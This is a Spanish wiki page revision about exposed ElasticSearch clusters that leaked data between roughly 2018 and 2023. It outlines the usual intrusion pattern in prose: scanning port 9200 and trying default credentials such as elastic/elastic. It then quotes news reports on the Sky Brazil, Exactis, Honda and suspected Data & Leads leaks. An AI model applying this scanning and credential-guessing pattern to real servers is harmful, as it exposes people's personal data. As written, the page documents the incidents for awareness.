Diferencia entre revisiones de «Volcados de datos de ElasticSearch»

Entre 2019 y 2023 numerosas empresas pusieron ElasticSearch en producción sin el plugin de seguridad (por que no se facilitaba sin pagar), en vez de poner un proxy delante que se ocupara de garantizar la seguridad, al estar la API administrativa accessible (a veces incluso con credenciales por defecto como elastic/elastic) se produjeron numerosos volcados. El patrón siempre era algo así:

• Un bot o un humano busca en el puerto 9200 de DNS o IPs conocidos si estaban los endpoints de Elastic
• Si lo estan intenta acceder sin AUTH, si no funciona prueba con elastic/elastic o similares
• Si estan lanzan comandos de listado de indices y posteriormente de batch download
• Si el que hizo el ataque fue un bot seguramente formaba parte de un indexador (crawler) web como Shodan y días después algún curioso lo encontró y lo denunció
• En los casos en que los dumps no estaban asociados a su ip o dns de origen a veces resultaba difícil averiguar la empresa pero casi siempre habia algun dato que hacía inequívoco ubicar la fuente del dump.

Listado de empresas conocidas que sufrieron robo de datos en ElasticSearch

Sky Brazil

As ElasticSearch based leaks become the latest source of massive data exposures, Sky Brasil, one of the biggest subscription television services in Brazil, is the latest to leave its customers exposed after not securing the server with a password.
Independent researcher Fabio Castro found the firm exposed the data of 32 million subscribers in 28.7GB of log files and a 429.1GB of API data that revealed names, home addresses, phone numbers, birth dates, client IP address, payment methods, and encrypted passwords.
"The data the server stored was Full name, e-mail, password, pay-TV package data (Sky Brazil), client ip addresses, personal addresses, payment methods," Castro told BleepingComputer. "Among other information the model of the device, serial numbers of the device that is in the customer's home, and also the log files of the whole platform." [1]

Data & Leads Inc (supuesto)

An ElasticSearch server database containing the information of nearly 57 million U.S. residents was found to have been left exposed without a password.
On November 20, 2018, Bob Diachenko, director of cyber risk research for Hacken, which also discovered the Kars4Kids leak, discovered the breach while conducting a security audit of publicly available servers with the Shodan search engine, according to a Nov. 28 blog post.
The data base was first indexed by Shodan on November 14, 2018 and contained the information including first and last names, employers, job titles, email, addresses, state, zip codes, phone numbers, and IP addresses. Diachenko also reportedly discovered a second cached database named "Yellow Pages," which reportedly held an additional 25,917,820 records, which appeared to be business entries. 
While the source of the leak was not immediately identifiable, the structure of the field ‘source’ in data fields is similar to those used by a data management company Data & Leads Inc. However, we weren’t able to get in touch with their representatives.
Moreover, shortly before this publication Data & Leads website went offline and now is unavailable. [2]

Exactis

Wired reported that Night Lion Security founder Vinny Troia discovered the Exactis leak earlier this month. Troia wasn't specifically looking for a leak from the company; he was merely using the Shodan search tool to find ElasticSearch databases. Exactis' databases appeared in the results, and it wasn't protected by any firewall, so Troia was able to gain access to the company's records. Troia said the databases contained records for 230 million consumers and 110 million businesses, but those figures could change as Exactis responds to and eventually investigates the incident.
Troia discovered this database on a lark with a quick search. What are the odds that people who make their livings peddling stolen information--or taking advantage of it to support more criminal activities--didn't find such a poorly safeguarded trove of personal data? That means a significant portion of the U.S. population (roughly 70 percent) likely had some of their records compromised because of Exactis. We might never know definitively if Troia was the first to discover these databases or merely the first to publicly disclose it.
The good news is that Exactis doesn't appear to have leaked financial information, Social Security Numbers, or similar highly sensitive data. The information it does collect could still be used by scammers or other attackers, but it's not a direct threat to someone's financial health. Wired reported that Exactis secured the databases after Troia revealed the problem, which should mean it can't be accessed by anyone else. However, the company hasn't publicly acknowledged the incident, so we don't know exactly what precautions it's taken. [3]

Honda

On December 11th, 2019, I have identified an open and unprotected Elasticsearch cluster with 976 millions of records which appeared to be part of Honda North America infrastructure, exposed online to anyone with a web browser.
An estimated 1 million records* in the database contained information about Honda owners and their vehicles.  No password or other authentication was needed to access the records, which included names, contact details, and vehicle information. [4]

Referencias